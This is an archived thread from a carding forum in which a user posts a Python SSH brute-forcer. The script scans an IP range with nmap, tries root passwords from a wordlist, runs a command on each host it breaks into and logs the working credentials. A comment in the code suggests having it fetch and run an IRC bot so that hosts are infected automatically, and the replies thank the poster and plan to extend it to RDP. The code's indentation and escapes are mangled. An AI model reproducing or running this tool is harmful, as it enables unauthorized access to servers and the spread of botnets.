Python SSH Scanner [Archive] - Carding Forum - Carding - Credit Cards - Dumps - Tracks - Laptops Shipping - Bank Accounts - Western Union Transfer

CpLover

02-04-2014, 06:28 AM

Python SSH Scanner

#!/usr/bin/python#SSH BruteForcer that scans an ip range for open ssh and bruteforcers
#Version 1.1

import sys, time, StringIO, commands, re

save_file = "sshz.txt"
verbose = 1
user = "root"

try:
import pexpect, pxssh
except(ImportError):
print "nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpectn"
sys.exit(1)

def scan():
ips = []
args = 'nmap -P0 '+ip_range+' -p 22 -open | grep open -B 3'
nmap = StringIO.StringIO(commands.getstatusoutput(args)[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("d*.d*.d*.d*", tmp)
if ipaddr:
ips.append(ipaddr[0])
return ips

def brute(ip, word):
if verbose != 0:
print "Trying:",word
try:
s = pxssh.pxssh()
s.login (ip, user, word, login_timeout=10)
s.sendline (command)
s.prompt()
print "n",s.before
s.logout()
print "t[!] Login Success:",user, word,"n"
logins.writelines("SSH Login:"+ip+":22 "+user+" "+word+"n")
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "n[-] Quitn"
logins.close()
sys.exit(1)

if len(sys.argv) != 3:
print "nUsage: ./ssh.py 198.162.1.1-255 words.txt usern"
sys.exit(1)

ip_range = sys.argv[1]
command = 'uname -a' # if you have linux irc bot wget/curl it and run it on this line to make auto infect ;) ~ h1t3m
logins = open(save_file, "a")

try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "n[-] Error: Check your wordlist pathn"
sys.exit(1)

print "n[+] Loaded:",len(words),"words"
print "[+] User:",user
print "[+] Save file:",save_file
if verbose != 0:
print "[+] Verbose Mode: On"
else:
print "[+] Verbose Mode: Off"
print "[+] Scanning:",ip_range
print "This might take a min..."

ips = scan()
if len(ips) <= 0:
print "n[-] No ips found running SSHn"
sys.exit(1)
else:
print "n[+] Found:",len(ips),"ips running SSH"

for ip in ips:
print "[+] BruteForcing:",ip,"n"
for word in words:
#Change this time if needed
time.sleep(0.5)
brute(ip, word.replace("n",""))
logins.close()
print "n[-] Donen"

u2u4me2017

03-02-2017, 11:21 AM

it is noot working now man

horusofficial

08-30-2017, 05:25 PM

This is nice, thanks again

tonagape

12-10-2017, 03:48 PM

Thanks for this man! It helps me a lot, but what if the port is closed?

Lock-N-Keys

01-12-2018, 06:40 PM

Thanks for this, going to make some tweaks to make it support both SSH and RDP as a little side project.

iseeyou

01-26-2018, 11:01 PM

waiting for the result:adoration: